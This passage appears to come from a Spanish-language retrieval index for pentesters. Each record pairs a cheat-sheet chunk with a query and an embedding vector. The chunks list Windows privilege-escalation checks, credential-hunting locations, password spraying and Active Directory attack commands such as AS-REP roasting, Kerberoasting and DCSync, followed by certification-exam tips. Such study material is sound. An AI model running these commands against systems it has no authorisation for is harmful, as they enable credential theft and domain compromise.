"```\n1. whoami /priv β†’ busca SeImpersonate, SeAssignPrimaryToken\n β†’ JuicyPotato, PrintSpoofer, GodPotato\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n Path con espacios sin comillas + carpeta\n escribible = exe propio\n3. AlwaysInstallElev β†’ reg query HKLM\\Software\\Policies\\Microsoft\\\n Windows\\Installer\n Si ambos = 1 β†’ msi propio = SYSTEM\n4. Service permisos β†’ accesschk.exe -uwcqv user *\n SERVICE_CHANGE_CONFIG = ownership\n5. Credenciales en discoβ†’ recurse find:\n Unattend.xml, sysprep.inf, web.config,\n cmdkey /list, registry SAM/SYSTEM\n6. AutoLogon en regisβ†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\\n CurrentVersion\\Winlogon\n7. Pass spraying β†’ la misma pass del user normal contra\n admin, administrator, sa, sysadmin\n8. WSL / OpenSSH server β†’ veces hay credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v\n Tareas con scripts editables\n10. UAC bypass + token impersonation\n```\n\n---", "indexar": "con quΓ© puedo ver si un programa tiene permisos de ejecuciΓ³n como sistema?", "v": [0.02432, 0.16277, -0.07512, -0.10097, 0.10661, -0.02074, 0.01638, -0.11326, -0.11364, -0.17919, -0.06707, 0.04946, 0.09039, -0.06503, 0.08411, 0.01422, 0.09471, -0.05342, 0.02498, 0.03892, 0.00297, -0.07589, -0.01939, -0.0455, -0.01078, 0.0758, 0.08755, 0.00045, -0.1276, -0.0793, 0.00107, 0.05799, 0.09461, -0.16183, 0.03102, 0.05829, 0.00096, 0.08616, 0.02959, 0.00669, 0.04784, -0.00735, -0.00743, 0.01666, 0.04101, -0.10137, 0.01162, 0.02307, -0.04658, -0.14751, -0.04415, 0.03914, -0.08919, -0.05572, 0.12903, -0.09993, 0.02824, -0.13051, -0.02303, 0.06692, -0.01998, 0.02428, 0.06756, -0.00273, 0.09457, 0.01733, 0.0999, -0.0002, 0.01623, 0.08573, -0.01039, 0.00528, 0.01347, 0.057, 0.0215, -0.01511, -0.1265, -0.03339, 0.01594, -0.02596, 0.01349, 0.03733, -0.10569, 0.03624, -0.04387, -0.06908, -0.04456, -0.09737, 0.01216, -0.07061, 0.02562, 0.03559, 0.01558, 0.12093, 0.10263, -0.0433, 0.05448, 0.09754, -0.05001, 0.05896, 0.04113, 0.00039, -0.10337, 0.138, -0.11942, 0.05081, 0.1105, -0.05111, -0.02346, 0.01792, -0.0516, 0.01785, -0.05413, -0.0468, -0.11689, 0.00444, -0.03667, -0.05817, -0.01283, -0.0377, -0.07304, 0.04275, -0.02444, -0.00648, 0.1305, -0.04601, -0.07578, 0.16817, -0.04414, 0.07599, 0.02587, -0.00509, 0.00806, -0.04749, -0.04445, -0.03257, 0.00125, 0.03656, -0.0571, -0.05767, 0.01497, 0.05717, 0.09153, 0.00241, 0.0396, -0.01676, -0.00746, -0.10264, -0.00384, -0.08243, 0.01832, 0.04426, -0.04534, 0.04714, -0.0646, 0.00077, -0.0128, -0.05312, 0.00161, 0.07521, -0.01146, 0.01923, -0.06513, 0.00797, 0.07317, 0.03845, -0.04656, -0.0321, 0.05621, 0.10116, -0.09234, 0.08036, 0.06792, -0.05568, 0.0622, -0.06367, -0.01341, -0.11883, 0.03911, 0.01488, -0.13256, 0.07305, 0.01486, -0.00536, -0.0028, -0.03866, -0.08165, 0.04675, 0.05778, 0.04756, 0.03627, 0.07886, 0.00882, -0.0053, -0.00783, 0.00329, -0.02792, -0.0163, 0.02573, -0.03645, -0.05776, 0.02783, 0.03244, -0.0612, 0.0314, 0.06752, 0.03517, 0.06036, 0.06085, 0.13202, 0.01421, -0.04658, 0.07664, -0.00908, -0.07358, 0.00744, -0.01548, 0.05155, 0.04992, -0.0079, 0.07686, 0.00919, 0.09019, 0.08174, 0.02925, -0.08493, 0.06088, 0.05445, 0.03674, 0.05308, -0.04038, -0.06554, -0.00138, -0.02619, 0.03727, -0.01232, -0.01033, -0.02906, -0.02593, -0.06258, 0.01916, 0.10456, 0.01339, -0.06274, -0.02472, 0.01469, -0.06482, -0.02655, 0.01473, -0.08085, -0.02237, 0.09313, 0.03593, -0.07412, 0.03259, -0.00635]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n1. whoami /priv β†’ busca SeImpersonate, SeAssignPrimaryToken\n β†’ JuicyPotato, PrintSpoofer, GodPotato\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n Path con espacios sin comillas + carpeta\n escribible = exe propio\n3. AlwaysInstallElev β†’ reg query HKLM\\Software\\Policies\\Microsoft\\\n Windows\\Installer\n Si ambos = 1 β†’ msi propio = SYSTEM\n4. Service permisos β†’ accesschk.exe -uwcqv user *\n SERVICE_CHANGE_CONFIG = ownership\n5. Credenciales en discoβ†’ recurse find:\n Unattend.xml, sysprep.inf, web.config,\n cmdkey /list, registry SAM/SYSTEM\n6. AutoLogon en regisβ†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\\n CurrentVersion\\Winlogon\n7. Pass spraying β†’ la misma pass del user normal contra\n admin, administrator, sa, sysadmin\n8. WSL / OpenSSH server β†’ veces hay credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v\n Tareas con scripts editables\n10. UAC bypass + token impersonation\n```\n\n---", "indexar": "quΓ© herramienta me ayuda a encontrar contraseΓ±as guardadas en archivos de configuraciΓ³n o registros?", "v": [0.18526, 0.08574, -0.0474, -0.29158, 0.04793, -0.1084, -0.06848, -0.10345, -0.0751, -0.03101, -0.10003, -0.08992, -0.00793, -0.07669, 0.09277, -0.01534, 0.13233, -0.02709, 0.04374, 0.00731, -0.04547, -0.01794, -0.05418, 0.03498, -0.12683, -0.11676, 0.10437, 0.00665, -0.19093, 0.03636, -0.01522, -0.02287, -0.00198, 0.085, -0.11123, 0.14378, 0.03985, 0.06612, -0.04712, 0.08116, 0.01191, 0.00911, -0.02391, 0.09507, -0.00913, -0.06541, 0.03701, 0.056, 0.06483, 0.01473, -0.05672, -0.17382, -0.09188, -0.06081, -0.02519, -0.13468, 0.19313, -0.06386, 0.02912, -0.05755, -0.2079, 0.07265, -0.03373, 0.10803, -0.07977, -0.06411, 0.09598, -0.05618, -0.09721, 0.08271, 0.01761, 0.05193, -0.03805, -0.07687, 0.01114, 0.01595, 0.12914, -0.03596, -0.00625, 0.0539, -0.02593, -0.01851, 0.03174, -0.02272, -0.09022, -0.0447, -0.02078, 0.00348, 0.03026, -0.12919, 0.07387, -0.06709, -0.071, 0.02461, 0.05605, -0.00056, 0.03464, -0.03146, -0.04994, -0.03615, 0.0149, 0.02731, -0.027, 0.1359, 0.01563, 0.01364, -0.04554, 0.00996, -0.04737, -0.06181, 0.11766, 0.05482, 0.01014, 0.03959, -0.03808, 0.04476, 0.04018, -0.0721, 0.02961, -0.04794, 0.02554, 0.04033, -0.01072, 0.00909, 0.02345, 0.06009, 0.01974, 0.06185, -0.03213, -0.05117, 0.01592, -0.09214, -0.08766, -0.0067, -0.01745, 0.0605, -0.03455, -0.05942, -0.04951, -0.01513, 0.04287, -0.03791, 0.00517, -0.07081, 0.07347, 0.02232, 0.06587, -0.00379, -0.03895, -0.03835, 0.01331, -0.05211, 0.05195, -0.00676, -0.03699, 0.07867, -0.03963, -0.0833, -0.10451, 0.02801, -0.04845, -0.04683, -0.04063, 0.00725, -0.03356, -0.06992, 0.0735, 0.08997, 0.04186, 0.00083, 0.03558, -0.02082, 0.04816, -0.05446, -0.01598, -0.02241, -0.03198, -0.04686, 0.01719, -0.06162, -0.06415, -0.03345, 0.01975, -0.00195, 0.04565, -0.06575, 0.08994, -0.03154, -0.03584, 0.03721, 0.02785, 0.00943, -0.00928, -0.04731, -0.01069, -0.01081, -0.00713, -0.0352, -0.0201, -0.07246, 0.02254, -0.05143, -0.04154, -0.0452, 0.03852, 0.03987, -0.12652, -0.0608, 0.02945, -0.02808, 0.0137, 0.01463, 0.00683, -0.02153, -0.05544, -0.03286, -0.0599, 0.05509, -0.00435, -0.06466, 0.06313, 0.01451, 0.06019, 0.02755, 0.01063, 0.00492, 0.0064, 0.02204, 0.00719, 0.02542, -0.01315, -0.03028, -0.00662, 0.02519, 0.06443, -0.02652, -0.02248, -0.00917, -0.00579, 0.01342, -0.02914, 0.05943, 0.03921, -0.03528, -0.03881, -0.03125, 0.00508, 0.01923, 0.01567, -0.01519, -0.00282, 0.02589, 0.04309, -0.05007, 0.03923, -0.06378]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n1. whoami /priv β†’ busca SeImpersonate, SeAssignPrimaryToken\n β†’ JuicyPotato, PrintSpoofer, GodPotato\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n Path con espacios sin comillas + carpeta\n escribible = exe propio\n3. AlwaysInstallElev β†’ reg query HKLM\\Software\\Policies\\Microsoft\\\n Windows\\Installer\n Si ambos = 1 β†’ msi propio = SYSTEM\n4. Service permisos β†’ accesschk.exe -uwcqv user *\n SERVICE_CHANGE_CONFIG = ownership\n5. Credenciales en discoβ†’ recurse find:\n Unattend.xml, sysprep.inf, web.config,\n cmdkey /list, registry SAM/SYSTEM\n6. AutoLogon en regisβ†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\\n CurrentVersion\\Winlogon\n7. Pass spraying β†’ la misma pass del user normal contra\n admin, administrator, sa, sysadmin\n8. WSL / OpenSSH server β†’ veces hay credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v\n Tareas con scripts editables\n10. UAC bypass + token impersonation\n```\n\n---", "indexar": "cΓ³mo verifico si hay tareas programadas con scripts editables para ejecutar comandos?", "v": [0.20277, 0.12581, -0.1381, -0.12225, 0.10385, -0.12725, 0.05349, 0.03724, 0.07031, -0.05745, -0.1144, 0.02615, 0.05333, -0.11478, 0.05924, 0.04874, 0.17066, -0.06446, 0.03737, 0.02745, 0.05915, -0.01455, -0.02568, 0.01397, -0.04761, 0.0238, -0.01737, 0.05516, -0.16264, -0.00237, -0.03535, 0.10819, 0.12658, -0.08149, -0.02738, 0.08912, -0.03301, -0.00993, -0.02057, 0.21449, -0.0222, 0.08277, -0.12686, 0.08217, 0.037, -0.09072, 0.13456, -0.01158, 0.02753, -0.09315, 0.06153, 0.01511, -0.10949, 0.03891, -0.08282, -0.02763, 0.0794, -0.121, -0.09106, 0.01918, -0.04682, -0.01526, 0.06409, 0.1186, 0.04415, 0.07026, 0.08602, -0.05913, 0.02287, 0.1097, -0.01475, 0.074, -0.09996, 0.04972, 0.03749, -0.08014, -0.03083, -0.05973, 0.03351, 0.02017, -0.06958, -0.00706, -0.019, 0.08535, -0.05142, -0.12795, -0.18057, -0.04214, -0.11081, -0.05502, 0.07928, 0.01465, -0.02209, 0.0354, 0.0409, 0.05814, 0.06005, 0.01211, 0.07368, 0.04611, -0.04013, -0.12908, -0.0681, 0.14485, -0.05765, 0.12119, 0.00334, 0.04069, 0.04358, 0.00823, 0.03674, -0.01453, -0.00862, -0.03226, -0.02816, -0.01134, -0.02328, -0.0509, 0.07284, -0.06627, -0.10595, 0.07618, -0.02554, 0.01506, 0.05065, -0.04687, 0.0317, 0.03888, -0.00041, 0.02054, -0.06363, -0.00276, 0.02791, -0.04545, -0.07874, 0.12021, 0.07635, -0.05419, -0.11539, -0.12177, 0.00261, 0.0894, 0.10113, 0.07928, 0.05291, 0.03598, -0.03189, -0.0271, -0.05881, 0.02585, 0.12375, 0.01713, -0.04848, 0.0638, -0.02944, -0.07868, -0.00824, 0.02071, -0.04494, 0.02744, 0.01241, -0.04164, -0.0401, -0.03598, 0.06099, -0.04228, -0.01411, 0.05291, -0.01476, 0.04172, -0.01346, 0.02255, 0.05148, -0.06266, 0.04264, -0.07089, 0.00717, 0.00058, -0.01885, 0.01093, -0.00015, 0.06547, 0.00887, 0.01447, -0.0227, -0.06339, 0.00854, -0.01941, 0.00599, 0.03234, -0.00581, 0.04063, 0.0099, -0.059, 0.05708, 0.00283, -0.01987, 0.00495, -0.06055, -0.03453, -0.04366, 0.05129, 0.02043, 0.00269, 0.03826, 0.03953, 0.00721, 0.04034, -0.02742, 0.03957, 0.02629, 0.00083, 0.01815, 0.02366, -0.03008, -0.00915, -0.00483, -0.0091, 0.01121, -0.00562, 0.021, -0.01916, 0.08978, -0.07712, 0.01683, -0.02795, 0.02264, 0.01864, 0.0278, 0.0284, 0.03899, -0.01082, -0.03505, -0.00993, 0.03529, -0.04204, -0.01652, 0.0271, 0.03399, -0.06469, 0.00637, 0.02563, 0.00753, -0.07316, -0.04469, 0.0141, -0.04494, -0.04571, -0.01976, 0.01005, -0.00103, -0.00957, 0.02845, -0.04268, -0.03984, -0.04938]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Active Directory β€” los 7 caminos que SIEMPRE pruebas\n\n```\n1. Anonymous SMB β†’ smbclient -L //IP -N\n nxc smb IP -u \"\" -p \"\"\n2. AS-REP Roasting β†’ impacket-GetNPUsers dominio/ -usersfile users.txt -no-pass\n (usuarios con \"Do not require pre-auth\")\n3. Kerberoasting β†’ impacket-GetUserSPNs dominio/user:pass -request\n (cuentas de servicio con SPN)\n4. GPP cpassword β†’ buscar en \\\\DC\\SYSVOL\\\\Policies\\\n Groups.xml con cpassword (rotos en clave AES fija)\n5. LAPS β†’ nxc ldap IP -u u -p p --module laps\n6. ACL abuses β†’ BloodHound te los pinta:\n GenericAll, WriteDACL, AddMember, ForceChangePassword\n7. DCSync β†’ con permisos DS-Replication, dumpear todo el dominio\n```\n\n---", "indexar": "con que programa puedo rolear contraseΓ±as en modo anΓ³nimo usando SMB?", "v": [0.18036, 0.06216, -0.00413, -0.18393, -0.0284, -0.09717, -0.15577, -0.20056, -0.16538, 0.03203, -0.02649, -0.00513, 0.09666, -0.12107, -0.10138, 0.07861, 0.07604, -0.01435, 0.01604, 0.14314, 0.06433, -0.06091, -0.02736, -0.02848, 0.04708, 0.02006, 0.07579, -0.00858, 0.05659, -0.04857, -0.04874, -0.05979, 0.13671, 0.00215, -0.02543, 0.07483, 0.01571, 0.06616, 0.05276, 0.13683, 0.11723, -0.02625, -0.04019, 0.08082, 0.07827, 0.05911, 0.01689, -0.00278, 0.09979, 0.03869, -0.06437, -0.09938, -0.1074, -0.03626, 0.05065, -0.03385, 0.14496, -0.12933, -0.0701, 0.06983, 0.00186, 0.10672, 0.07611, 0.04228, 0.02126, -0.1117, 0.09543, 0.04126, -0.12353, 0.07288, -0.03374, 0.03744, 0.01493, 0.03722, 0.09859, 0.05433, -0.04953, -0.04797, 0.02824, 0.03867, -0.08772, -0.08286, 0.04055, 0.13064, -0.11074, 0.08286, 0.03504, -0.04074, -0.00648, -0.04658, 0.08326, 0.01104, 0.00654, 0.04109, 0.05951, -0.07112, 0.00613, 0.05238, -0.03489, -0.01557, 0.03161, 0.05195, -0.0653, 0.20063, -0.02708, 0.052, -0.00206, -0.03363, 0.05355, -0.01666, 0.03988, 0.04358, -0.05465, -0.0378, -0.02793, 0.01738, 0.00337, -0.09429, 0.08965, -0.04486, -0.08494, -0.04537, -0.04045, -0.02557, 0.05341, -0.01301, 0.04709, 0.05353, -0.02058, -0.00571, -0.00028, 0.04435, -0.06899, -0.01832, -0.03041, 0.02277, 0.05075, -0.05711, -0.06633, -0.00223, -0.04698, 0.04438, 0.05344, 0.03444, 0.00307, 0.06812, -0.00781, -0.11948, 0.01888, -0.07388, 0.06105, 0.03657, -0.00681, 0.11573, -0.01158, 0.02526, -0.04119, -0.14383, -0.04382, 0.04702, -0.09786, -0.05574, -0.05315, -0.04147, -0.00027, -0.07179, 0.04032, 0.03511, 0.01859, 0.07098, -0.0455, 0.0977, 0.10311, -0.09643, 0.06326, -0.01718, -0.00747, -0.05591, 0.01329, -0.00769, 0.02064, -0.02748, 0.01282, 0.03281, 0.00706, -0.04959, 0.0438, 0.01086, 0.01509, -0.06597, 0.04298, -0.01043, 0.02271, 0.02094, -0.03427, 0.0256, 0.04104, -0.00236, -0.0463, -0.08429, 0.02845, 0.02909, -0.03323, -0.03316, 0.03772, 0.05083, -0.01404, 0.00669, 0.06791, 0.04384, 0.02726, -0.04055, 0.01358, 0.00587, -0.02727, -0.0743, -0.01265, 0.05934, 0.03131, 0.02084, 0.01528, 0.01838, 0.06861, 0.06357, 0.02116, -0.08988, -0.0143, 0.0198, 0.01581, -0.00918, -0.03212, 0.00773, -0.01319, 0.0199, 0.08, -0.01637, -0.06462, -0.02542, 0.0071, -0.01891, -0.08644, -0.01964, -0.01774, -0.03853, -0.08456, -0.00579, -0.07276, -0.01591, -0.02403, 0.00213, -0.03088, 0.02356, -0.03833, -0.02798, 0.01893, 0.05708]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Active Directory β€” los 7 caminos que SIEMPRE pruebas\n\n```\n1. Anonymous SMB β†’ smbclient -L //IP -N\n nxc smb IP -u \"\" -p \"\"\n2. AS-REP Roasting β†’ impacket-GetNPUsers dominio/ -usersfile users.txt -no-pass\n (usuarios con \"Do not require pre-auth\")\n3. Kerberoasting β†’ impacket-GetUserSPNs dominio/user:pass -request\n (cuentas de servicio con SPN)\n4. GPP cpassword β†’ buscar en \\\\DC\\SYSVOL\\\\Policies\\\n Groups.xml con cpassword (rotos en clave AES fija)\n5. LAPS β†’ nxc ldap IP -u u -p p --module laps\n6. ACL abuses β†’ BloodHound te los pinta:\n GenericAll, WriteDACL, AddMember, ForceChangePassword\n7. DCSync β†’ con permisos DS-Replication, dumpear todo el dominio\n```\n\n---", "indexar": "quΓ© herramienta me sirve para obtener usuarios mediante AS-REP Roasting sin contraseΓ±a?", "v": [-0.15783, 0.04969, -0.14333, -0.22609, 0.11769, -0.04694, -0.06511, -0.13518, -0.07309, -0.00745, -0.1274, -0.08171, 0.08181, -0.11006, 0.25357, -0.00031, -6e-05, 0.09481, 0.02577, 0.11185, -0.00528, -0.11402, -0.10364, 0.06147, 0.0225, 0.08137, 0.10393, -0.07126, -0.06215, -0.01082, 0.06761, -0.02698, -0.03243, 0.01511, -0.1634, 0.05156, 0.02968, 0.06751, 0.04499, 0.14342, 0.0668, 0.05424, -0.16312, 0.12735, 0.01448, 0.04199, -0.01158, 0.00616, 0.00814, 0.1659, -0.09345, -0.11294, -0.1196, -0.0566, -0.01665, -0.10584, 0.18802, -0.09214, -0.00941, -0.09457, -0.13371, 0.01251, 0.02484, 0.0379, -0.0535, -0.09628, 0.05688, -0.07367, -0.04195, 0.0772, -0.02789, 0.00851, -0.03439, -0.02904, 0.00986, -0.01536, 0.01173, 0.01208, 0.05422, -0.00605, 0.0079, -0.03747, -0.07942, -0.03164, -0.00784, -0.02249, 0.11225, 0.00566, 0.09349, -0.14813, 0.06248, 0.01346, -0.01119, 0.02148, 0.03022, -0.0571, 0.00797, -0.04902, -0.03351, -0.04776, 0.07937, -0.0001, -0.03458, 0.06033, -0.02731, -0.03057, -0.0077, -0.04094, -0.00518, -0.0547, 0.06822, 0.01033, -0.03474, -0.04651, 0.0001, 0.04268, -0.02748, -0.11922, 0.01456, -0.0104, 0.003, -0.00503, -0.02206, -0.00995, 0.05909, 0.06187, 0.01658, 0.07689, -0.03384, -0.09276, 0.02235, -0.06153, -0.06543, 0.07318, 0.00119, -0.04076, -0.00978, -0.15288, -0.0934, -0.05597, 0.00124, -0.00606, -0.0282, -0.05901, 0.00827, 0.0045, 0.07965, -0.0473, -0.04339, 0.02356, -0.01879, -0.05575, -0.0698, 0.02834, -0.04385, 0.00655, -0.0582, -0.02461, -0.09834, 0.06927, -0.07935, -0.08708, 0.02859, 0.02068, -0.05068, -0.05837, 0.0175, 0.01355, 0.08809, 0.04815, 0.0443, 0.02273, 0.04341, -0.03367, 0.00095, -0.02467, -0.01663, -0.00245, -0.0409, -0.07018, -0.02359, -0.06447, 0.02844, 0.0124, -0.03088, -0.08918, 0.0249, -0.01998, 0.00218, -0.00826, 0.02186, 0.01814, 0.03561, -0.01224, 0.02115, -0.03596, -0.02953, -0.06206, 0.00167, -0.01958, -0.00144, 0.0217, -0.00576, -0.04054, 0.07137, 0.01279, -0.00568, -0.06629, 0.01382, 0.00433, 0.04873, -0.01472, 0.02593, -0.03692, 0.01282, -0.05517, 0.04161, 0.04297, -0.06323, 0.00191, 0.03557, -0.01342, 0.04808, 0.05999, -0.01033, 0.05636, -0.03767, 0.02718, -0.02182, -0.02041, 0.0249, -0.01088, -0.04516, -0.00763, 0.04114, -0.06791, -0.0504, -0.0236, -0.01487, -0.00068, -0.05394, 0.02027, -0.0041, -0.06217, -0.03007, 0.00937, -0.03036, -0.05219, -0.02006, -0.00863, -0.07005, -0.01214, 0.01382, -0.02437, 0.02606, -0.01127]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Active Directory β€” los 7 caminos que SIEMPRE pruebas\n\n```\n1. Anonymous SMB β†’ smbclient -L //IP -N\n nxc smb IP -u \"\" -p \"\"\n2. AS-REP Roasting β†’ impacket-GetNPUsers dominio/ -usersfile users.txt -no-pass\n (usuarios con \"Do not require pre-auth\")\n3. Kerberoasting β†’ impacket-GetUserSPNs dominio/user:pass -request\n (cuentas de servicio con SPN)\n4. GPP cpassword β†’ buscar en \\\\DC\\SYSVOL\\\\Policies\\\n Groups.xml con cpassword (rotos en clave AES fija)\n5. LAPS β†’ nxc ldap IP -u u -p p --module laps\n6. ACL abuses β†’ BloodHound te los pinta:\n GenericAll, WriteDACL, AddMember, ForceChangePassword\n7. DCSync β†’ con permisos DS-Replication, dumpear todo el dominio\n```\n\n---", "indexar": "que software es necesario para extraer claves de servicio Kerberos a travΓ©s de SPN?", "v": [0.07059, -0.13641, -0.10633, -0.11047, 0.04302, -0.25988, -0.0099, -0.13082, -0.03727, -0.11819, -0.15042, 0.06798, -0.00471, -0.2751, 0.02157, 0.03862, -0.00624, -0.18348, 0.12904, 0.21906, -0.00806, 0.03199, -0.10384, -0.06351, -0.15178, 0.0319, 0.00203, 0.00506, -0.13434, 0.11945, -0.08369, 0.00211, 0.03381, -0.07132, -0.00219, 0.01504, -0.05064, 0.18763, 0.05347, 0.04056, 0.06203, -0.00064, 0.02388, 0.08273, -0.00186, 0.01979, 0.06735, 0.0671, 0.0407, -0.01955, 0.00367, -0.03215, -0.09453, -0.14884, -0.03868, -0.11666, 0.05855, -0.04064, -0.09921, -0.01911, -0.05172, -0.00472, -0.09484, -0.01466, -0.00812, -0.15805, 0.035, -0.02476, -0.09134, 0.03662, -0.08928, 0.04309, 0.11242, 0.04497, -0.0171, -0.02046, 0.00067, -0.05724, -0.03032, 0.10709, 0.05184, 0.02697, -0.03583, 0.03596, -0.09238, -0.06742, 0.12105, -0.03262, -0.00974, -0.0841, 0.04403, 0.05861, 0.03341, 0.06286, 0.03952, -0.01542, -0.03186, -0.01844, 0.04845, 0.00274, -0.00745, -0.09602, -0.04808, 0.10821, -0.04531, -0.04173, 0.0131, -0.0253, -0.01781, -0.01671, 0.0058, 0.04943, 0.03381, -0.07563, -0.094, -0.01748, -0.02152, -0.11112, -0.02927, -0.01209, -0.01362, -0.0368, 0.03499, -0.09668, -0.05474, -0.02305, 0.01562, 0.04468, 0.0228, -0.0792, -0.01827, 0.03682, -0.04738, 0.00426, 0.03619, 0.03445, 0.07326, -0.06581, -0.01215, 0.02417, -0.04089, -0.03439, -0.00187, 0.04505, 0.10186, -0.05305, 0.03072, 0.01811, -0.0255, -0.01473, 0.00425, 0.03516, -0.01595, 0.0213, -0.07101, -0.00738, -0.02314, -0.03774, -0.04702, 0.08011, -0.07254, -0.07394, 0.01253, -0.0003, 0.02618, -0.03849, -0.02619, 0.02549, -0.01635, 0.05467, -0.01068, 0.03866, 0.02611, -0.06684, -0.05663, -0.02618, 0.01376, -0.10015, -0.06306, -0.03649, -0.06217, -0.02583, 0.00189, 0.02391, -0.04433, 0.00411, 0.02123, -0.03976, -0.06038, -0.04236, 0.02804, 0.02311, -0.03279, 0.02201, -0.00726, -0.0084, -0.03233, -0.03698, 0.02957, -0.07132, -0.12077, 0.0287, -0.01065, -0.03604, 0.00956, 0.06328, -0.002, 0.03066, -0.03458, 0.06122, 0.08842, -0.03797, 0.04885, -0.03073, -0.04831, -0.03062, 0.00863, 0.00785, 0.01787, 0.03917, -0.00749, -0.01538, 0.03401, 0.01233, -0.01991, -0.01892, 0.02863, 0.09008, 0.03559, -0.01653, -0.02593, 0.02342, -0.00339, -0.00793, 0.02277, 0.00925, 0.00346, -0.03357, -0.02358, -0.0505, -0.0177, 0.02531, -0.03506, -0.03988, -0.00483, -0.03305, -0.06415, -0.02157, 0.03403, -0.02496, 0.01885, -0.00922, 0.00445, 0.00485, 0.03295, -0.02705]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de \"examen real\" (anti-pΓ‘nico)\n\n```\n─ Time management ────────────────────────────────────────\n 24h β‰  24h. Duermes 6h. Comes. Te duchas.\n Regla: 1.5h sin progreso = cambia de mΓ‘quina.\n Cierra y vuelve mΓ‘s tarde con cabeza fresca.\n\n─ DocumentaciΓ³n EN VIVO ──────────────────────────────────\n Captura TODO con Flameshot/Greenshot mientras lo haces.\n No al final. Al final no recuerdas el comando exacto.\n Cada flag con hostname visible (ipconfig/ifconfig).\n local.txt = user proof, proof.txt = root proof.\n\n─ ReutilizaciΓ³n de credenciales ──────────────────────────\n La pass del usuario A muchas veces vale para usuario B.\n PRUEBA siempre cada pass que pillas contra TODOS los hosts.\n\n─ El AD set es 40 puntos seguidos ────────────────────────\n 3 mΓ‘quinas encadenadas. Si te atascas en mΓ‘quina 1,\n no avanzas en 2 y 3. Empieza por ahΓ­ con tiempo.\n\n─ Standalones independientes ─────────────────────────────\n 3 mΓ‘quinas independientes de 20pts cada una.\n user (10pt) + root (20pt). Saca user de las 3\n ANTES de obsesionarte con root de una.", "indexar": "que programa sirve para grabar la pantalla mientras resuelvo un examen real?", "v": [-0.00763, 0.02939, -0.16764, -0.11488, 0.09016, -0.11455, 0.01609, -0.03929, 0.05434, -0.13301, -0.01013, -0.0537, 0.00723, -0.02251, 0.08296, 0.15079, -0.09086, -0.03483, 0.01032, 0.08109, -0.00043, 0.00488, 0.00123, -0.02319, -0.02294, 0.01081, -0.04114, 0.00863, 0.0141, -0.05436, 0.08116, 0.10368, 0.01363, -0.279, -0.08228, -0.06507, 0.08648, -0.00816, -0.06943, 0.15254, 0.0827, 0.05469, -0.05915, 0.00175, 0.02501, -0.02607, 0.08753, 0.0135, -0.11654, -0.03869, -0.00808, 0.05499, 0.03816, 0.00056, 0.0016, -0.08168, 0.05291, -0.10466, 0.10265, -0.09801, 0.07417, -0.07571, 0.05044, -0.01663, 0.10198, 0.00117, 0.09354, 0.04745, -0.10453, -0.02115, -0.1064, 0.07626, 0.00562, -0.01539, -0.05342, -0.0287, -0.13737, -0.10588, 0.03067, -0.09337, 0.00912, -0.07644, -0.01976, 0.07697, -0.15473, -0.01831, 0.00108, -0.04485, -0.06107, -0.04856, 0.04194, 0.12027, 0.02235, 0.03912, 0.10468, -0.03729, 0.16014, 0.01009, 0.00665, 0.00126, 0.13075, -0.0593, -0.09131, 0.04429, -0.04401, 0.17609, 0.00843, -0.08201, -0.04074, 0.01449, 0.00872, 0.10312, -0.11418, -0.04839, -0.08022, -0.0421, 0.00983, -0.036, 0.01081, -0.0043, -0.03509, 0.039, -0.01611, -0.03826, 0.04789, 0.01769, -0.01779, 0.05051, -0.03639, 0.13573, -0.00111, 0.01847, -0.01718, -0.00784, -0.02879, -0.09976, 0.00465, 0.02509, 0.03183, -0.07785, 0.04148, 0.12471, 0.03215, -0.0887, 0.05038, 0.00955, -0.03281, -0.04748, -0.05827, 0.06218, -0.02211, 0.0432, 0.03871, 0.05274, -0.04401, -0.03097, 0.03035, -0.06164, -0.04073, 0.04043, -0.00647, -0.0436, -0.05363, -0.02845, 0.0042, -0.00221, -0.08167, -0.0004, 0.04737, 0.03604, -0.01235, 0.01897, 0.04742, -0.09027, -0.0118, 0.00339, 0.03631, -0.06294, 0.05962, -0.10197, -0.08736, 0.05115, 0.00708, 0.04091, 0.03402, 0.05726, -0.01663, -0.01742, 0.07028, 0.00564, 0.06877, 0.01963, -0.03845, 0.03191, -0.01688, -0.02641, -0.07353, -0.00636, 0.05685, -0.02109, -0.0753, -0.06032, -0.04121, -0.05969, 0.06478, 0.07661, -0.0738, 0.07176, 0.03706, 0.03693, -0.06928, 0.00653, 0.01037, -0.00983, -0.02974, -0.05356, 0.06072, 0.04401, 0.00506, 0.03196, 0.029, 0.01273, 0.0189, 0.04318, -0.04216, 0.00039, 0.05429, 0.04064, -0.00898, -0.0223, -0.00638, 0.01057, -0.00208, -0.03447, 0.03673, 0.0205, 0.00258, -0.01634, -0.04365, -0.11337, -0.00361, 0.07097, -0.07507, -0.05219, -0.00595, -0.00123, -0.04296, 0.01131, 0.06224, -0.1024, -0.05917, 0.05149, 0.07278, -0.00048, 0.04762, -0.00336]} -{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Trampas de \"examen real\" 